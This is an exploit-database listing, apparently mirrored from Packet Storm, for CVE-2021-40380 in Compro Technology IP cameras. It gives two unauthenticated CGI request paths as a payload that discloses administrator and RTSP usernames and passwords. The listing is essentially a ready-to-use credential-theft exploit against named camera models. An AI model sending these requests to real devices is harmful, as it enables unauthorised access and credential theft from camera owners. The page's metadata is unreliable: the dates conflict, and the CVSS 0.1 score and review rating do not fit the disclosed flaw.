Exploit for Compro Technology IP Camera Credential Disclosure CVE-2021-40380

Name: Exploit for Compro Technology IP Camera Credential Disclosure CVE-2021-40380
Rating: 5 (150 reviews)

2021-09-02 | CVSS 0.1

## https://sploitus.com/exploit?id=PACKETSTORM:164027
# Exploit Title: Compro Technology IP Camera - 'Multiple' Credential Disclosure  
# Date: 2021-09-30  
# Exploit Author: icekam,xiao13,Rainbow,tfsec  
# Software Link: http://www.comprotech.com.hk/  
# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540  
# CVE : CVE-2021-40380  
  
There are unauthorized access vulnerabilities, which can lead to the  
disclosure of device administrator usernames and passwords or rstp  
usernames and passwords.  
  
Payload:  
  
/cgi-bin/cameralist/cameralist.cgi  
/cgi-bin/cameralist/setcamera.cgi?id=*  
  
please refer to:  
https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md